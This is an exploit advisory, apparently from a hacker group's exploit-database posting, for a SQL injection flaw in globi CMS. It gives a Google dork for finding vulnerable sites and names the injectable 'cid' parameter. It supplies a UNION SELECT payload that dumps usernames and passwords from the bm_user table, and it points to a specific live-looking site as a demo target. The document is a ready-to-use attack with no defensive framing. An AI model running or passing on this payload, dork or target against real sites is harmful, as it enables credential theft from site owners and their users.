############################################################################ # Exploit Title: globi CMS SQL Injection Vulnerability # Google Dork: "Powered by globi" # Date: 9/7/2012 # Author: Ajax Security Team # Discovered By: Crim3R # Home: WwW.AjaxTm.CoM # Vendor Software: http://www.globi.ca/ # Version: All Version # Category:: webapps # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ ================================== [+] cid parametr is Vulnerable to sqli [+] union+select+1,concat(username,0x3a,password),3,4,5,6+from+bm_user-- D3m0: http://www.bench-mark.ca/index.php?cid=169 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369